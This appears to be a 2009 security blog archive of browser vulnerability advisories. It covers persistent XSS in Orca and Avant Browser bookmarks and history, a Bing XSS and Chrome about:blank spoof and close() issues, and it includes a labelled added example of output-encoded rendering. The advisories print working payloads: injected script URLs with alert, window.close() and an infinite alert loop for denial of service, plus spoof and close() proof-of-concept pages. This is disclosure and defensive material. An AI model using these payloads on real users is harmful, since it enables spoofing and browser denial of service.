Orca Browser browser:home Persistent XSS vulnerability

Friday, July 31, 2009
###########################################
Orca Browser browser:home Persistent XSS vulnerability
vendor url: http://www.orcabrowser.com/
Advisory: http://lostmon.blogspot.com/2009/07/orca-browser-browserhome-persistent-xss.html
vendor notified: NO    exploit available: yes
############################################

#############
description
#############

Orca Browser's user-friendly interface brings a new level
of clarity and efficiency to your browsing experience, and
frequent upgrades have steadily improved its reliability.
Avant Browser is freeware. That's right, 100% free!

Orca Browser contains a flaw that allows a remote cross-site
scripting attack. This flaw exists because the application does
not properly validate URL links upon submission to the
bookmarks in the browser:home page.
This could allow a user to create a specially crafted URL or
bookmark that would execute arbitrary code in a user's browser,
within the trust relationship between the browser and the server,
when browser:home is loaded, leading to a loss of integrity.

###############
version tested
###############

Avant Browser 1.2 build 2

#########
solution:
##########

Update to version 1.2 build 3;
this version addresses this vulnerability.


#############
timeline:
#############

discovered: 23 Jul 2009
disclosure: 30 Jul 2009

##################
testing
##################

Demonstration video => http://www.spymac.com/details/?2417793

Open Orca Browser; by default the browser loads the
'browser:home' page. On this page we can see three
columns: 1 top sites, 2 history and 3 recent bookmarks.

The bookmarks column is vulnerable to XSS. Let's
demonstrate it.
I made a web page that is possibly vulnerable to an XSS condition:

<?php
$cmd = $_GET['id']; // the demo page only needs to accept an 'id' parameter
?>

I placed an online document for the demo here =>
http://usuarios.lycos.es/reyfuss/id.php?id=

Open Orca Browser and navigate to

http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
Click the bookmark toolbar, click "new bookmark" and add this URL.

Load browser:home, or close and reopen the browser; the script
is executed in the bookmarks column.


################ End #####################

thanks to estrella for being my light
thanks to Brink, who investigates with me.
thanks to all who day after day support me !!!
sincerely:
--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind...

Avant Browser browser:home Persistent XSS vulnerabilities

Thursday, July 30, 2009
###########################################
Avant Browser browser:home Persistent XSS vulnerabilities
vendor url: http://www.avantbrowser.com/
Advisory: http://lostmon.blogspot.com/2009/07/avant-browser-browserhome-persistent.html
vendor notified: NO    exploit available: yes
############################################

#############
description
#############

Avant Browser's user-friendly interface brings a new level
of clarity and efficiency to your browsing experience, and
frequent upgrades have steadily improved its reliability.
Avant Browser is freeware. That's right, 100% free!

Avant Browser contains a flaw that allows a remote cross-site
scripting attack. This flaw exists because the application does
not properly validate URL links upon submission to the
history, bookmarks and top sites columns in the browser:home page.
This could allow a user to create a specially crafted URL or
bookmark that would execute arbitrary code in a user's browser,
within the trust relationship between the browser and the server,
when browser:home is loaded, leading to a loss of integrity.

###############
version tested
###############

Avant Browser 11.7 build 35

#########
solution:
##########

Update to version 11.7 build 36;
it is reported and tested that this version
isn't vulnerable.


#############
timeline:
#############

discovered: 23 Jul 2009
disclosure: 30 Jul 2009

##################
testing
##################

Demonstration video => http://www.spymac.com/details/?2417793
Open Avant Browser; by default the browser loads the
'browser:home' page. On this page we can see three
columns: 1 top sites, 2 history and 3 recent bookmarks.

All three columns are vulnerable to XSS. Let's
demonstrate it in the three cases.
I made a web page that is possibly vulnerable to an XSS condition:

<?php
$cmd = $_GET['id']; // the demo page only needs to accept an 'id' parameter
?>

I placed an online document for the demo here =>
http://usuarios.lycos.es/reyfuss/id.php?id=

Open Avant Browser and navigate to
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
Wait until it loads, then close the browser
or open the browser:home URI.

The script is executed and we have two columns affected,
the first and the second.

Go to the tools menu and delete the history ...

Open Avant Browser and go to
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>

Right-click, select "add bookmark" and add it.

Load browser:home again and the XSS is executed
in the bookmarks column.

So if, for example, we want to deny access to
browser:home, we can load =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>window.close()</script>
and when the browser is opened and loads browser:home on start,
the script closes it.

And if we want a denial of service, we can load =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>while(1)alert(1)</script>
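The bug in both the Orca and Avant advisories is the same: a stored URL or title is concatenated into the browser:home HTML without encoding. The following is an added example (not Avant's or Orca's code) of a renderer for such entries, with the raw concatenation the advisories describe beside an output-encoded version, run against the advisory's own test URL. The entry shape and helper names are assumptions of this example.

```javascript
// Added example (not code from Avant or Orca): rendering stored bookmark /
// history entries into browser:home HTML. The advisories' bug is that the raw
// URL is concatenated into the page; the fix is output encoding per context.

// HTML-escape a value for use as element text or inside a double-quoted attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Only http(s) links may become hrefs (javascript:, data: etc. are dropped).
// The WHATWG URL parser also percent-encodes " < > in the query string,
// which is a second, independent layer of defence for the href context.
function safeHref(url) {
  try {
    const u = new URL(url);
    if (u.protocol === 'http:' || u.protocol === 'https:') return u.href;
  } catch (e) {
    // not a parsable URL: fall through to an inert link
  }
  return '#';
}

// Vulnerable rendering, as the advisories describe: raw string concatenation.
function renderEntryUnsafe(entry) {
  return `<li><a href="${entry.url}">${entry.title}</a></li>`;
}

// Hardened rendering: every untrusted value is encoded for where it lands.
function renderEntrySafe(entry) {
  return `<li><a href="${escapeHtml(safeHref(entry.url))}">${escapeHtml(entry.title)}</a></li>`;
}

// Constructed sample (assumed shape): the advisory's test URL, bookmarked
// under a hostile title.
const SAMPLE_ENTRY = {
  url: 'http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>',
  title: 'demo <img src=x onerror=alert(1)>',
};

// Smoke check used to compare the two renderers: did an injected tag survive?
function containsInjectedTag(html) {
  return /<(script|img)/i.test(html);
}
```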

################ End #####################


Bing.com Search engine, cache.aspx XSS

Wednesday, July 29, 2009
###########################################
Bing.com Search engine, cache.aspx XSS
vendor url: http://ww.bing.com
advisory: http://lostmon.blogspot.com/2009/07/bingcom-search-engine-cacheaspx-xss.html
vendor notified: yes    vendor confirmed: yes
###########################################

Bing search engine contains a flaw that allows a remote cross-site
scripting attack. This flaw exists because the application does not
properly validate the 'q' variable upon submission to the 'cache.aspx'
script. This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading to
a loss of integrity.

#########
solution:
##########

No solution at this time,
but Microsoft is planning to patch it
in the new release of the Bing code.

#############
timeline:
#############

discovered: 08 Jun 2009
vendor notified: 11 Jun 2009
vendor response: 11 Jun 2009
vendor last response: 30 Jun 2009
disclosure: 29 Jul 2009


################ End #####################


Google Chrome About:blank spoof

Tuesday, July 28, 2009
#######################################
Google Chrome About:blank spoof
vendor url: www.google.com
advisory: http://lostmon.blogspot.com/2009/07/google-chrome-aboutblank-spoof.html
vendor notified: YES    exploit available: YES
########################################

issue :=>http://code.google.com/p/chromium/issues/detail?id=17876


Chrome Version: 2.0.172.37 (official build)
URLs (if applicable) :
Other browsers tested:
Add OK or FAIL after other browsers where you have tested this issue:
Safari 4: FAIL
Firefox 3.x: FAIL
IE 7: OK
IE 8: OK

What steps will reproduce the problem?
1. Open the exploit page
2. Click the link
3. Look at the about:blank page

What is the expected result?
Show an error page or search in Google

What happens instead?

Content is written into the about:blank page


Please provide any additional information below. Attach a screenshot if
possible.

########################
Sample code
########################

<center>
<h1>Chrome about:blank Spoof</h1>
</center>

This vulnerability is based on http://www.securityfocus.com/bid/35829/ and
http://www.securityfocus.com/bid/35803
by Juan Pablo Lopez Yacubian and Michael Wood.

<p>
<a href='javascript:spoof()'><h2>test Spoof !!</h2></a>
</p>


<script>
function spoof()
{
  // The published advisory padded the URL with a literal run of several
  // hundred "%20" sequences (about 580, wrapped across lines by the blog);
  // repeat() rebuilds that padding as one valid string literal.
  var padding = '%20'.repeat(580);

  // Open the padded URL, then write into the new window's document and stop
  // the pending load, so the spoofed content stays in the window.
  var a = window.open('http://www.example.com' + padding + ',');
  a.document.write('<H1>FAKE PAGE</h1>');
  a.document.write('<title>test</title>');
  a.stop();
}
</script>
################ End #####################

Acknowledgments from Microsoft online services.

Wednesday, July 08, 2009
Security Researcher Acknowledgments
for Microsoft Online Services

The Microsoft Security Response Center (MSRC) is pleased to recognize the security researchers who have helped make Microsoft online services safer by finding and reporting security vulnerabilities. Each name listed represents an individual or company who has responsibly disclosed one or more security vulnerabilities in our online services and worked with us to remediate the issue.
http://technet.microsoft.com/en-us/security/cc308575.aspx#0609

June 2009 Security Researchers

  • Blue Moon Consulting
    bluemoon.com.vn

  • Lostmon Lords
    lostmon.blogspot.com

  • Security Team
    dongabank.com.vn

  • Nenad Vijatov
    blog.vijatov.com


Google Chrome close() issue

Tuesday, July 07, 2009
##############################
Google Chrome close() issue
VENDOR: http://www.google.com/chrome/
article = http://lostmon.blogspot.com/2009/07/google-chrome-close-issue.html
##############################

Chrome Version: 2.0.172.33 (official build)
URLs (if applicable) :
Other browsers tested:
Safari 4: OK
Firefox 3.x: OK
IE 7: OK
IE 8: OK

What steps will reproduce the problem?

1 - Open a web page
2 - Navigate to another page.

Google Chrome automatically closes the tab and, if we have
only one tab, it closes the Chrome process.

What is the expected result?

Google Chrome doesn't close, or prompts before closing.

What happens instead?

Google Chrome closes the tab, or if we have only
one tab it closes as well, without any confirmation.

###########
Abstract
###########

To test all of this you need an installed web server,
and some patience XDD

#############
test 1
#############

Create a new HTML document and write in it:

<html><body onload='close()'></body></html>
Save it as test1.html in c:\test\ for testing.

1.1 - Open Google Chrome and open it with the file handler, like
file:///c:/test/test1.html
Chrome does not close the window and nothing appears...

1.2 - Open the file in a trusted intranet zone via
http://localhost/test/test1.html or via IP
http://192.168.1.100/test/test1.html
Chrome does not close the window and nothing appears...


1.3 - Open the hard disk, select c:\test\test1.html, right-click
and open with Google Chrome.
Chrome opens and closes automatically.

If we change to another event like onblur, or the onfocus event,
it's interesting because if we try to use the inspector to view
the source code, click the body tag and then close the inspector,
the tab is closed too. This apparently only affects the case where
we open the HTML document as in test mode 1.3.

So this issue apparently can't be exploited in a remote scenario.

###############
test 2
###############

Create a new HTML file, write the following inside it, and save it as
test2.html in the test folder.

<html>
<head>
<title>.:[-Google Chrome close() issue PoC By Lostmon-]:.</title>
</head>
<body>
<script>
// CloseCrome() is intentionally undefined: the exception lands in the catch
// block, which schedules a reload and then calls close().
try { CloseCrome(); } catch(e) {
setTimeout("location.reload();",20);
close(); }
</script>
<h2>.:[-Google Chrome close() issue PoC By Lostmon-]:.</h2>

<p>Google Chrome :2.0.172.33 (official build)<br>
WebKit 530.5<br>V8 1.1.10.13<br>
User Agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br>
AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5</p>
</body>
</html>

2.1 - Open it via the file protocol handler file:///c:/test/test2.html.
Chrome does not close the window and nothing apparently appears,
but if we try to navigate to another site like www.google.com
the tab closes automatically.

2.2 - Open it on a trusted web server, http://localhost/test/test2.html
or http://192.168.1.100/test/test2.html. Chrome does not close
the window and nothing apparently appears; but if we try to navigate
to another site like www.google.com the tab closes automatically.

2.3 - Open the hard disk, select c:\test\test2.html, right-click
and open with Google Chrome.
Chrome opens and closes automatically.

##############
conclusion
##############

This issue can be a vulnerability, and it can be used, for
example, to build malware that traps the browser in a
given location: if the user tries to look at the code
(onfocus), tries to navigate to another site (test2.html), or another
event fires, the window can close without interaction. Then, if
malware, a malicious web page or a browser hijacker can
load it as the default web page, this can be a
Denial of Service condition.

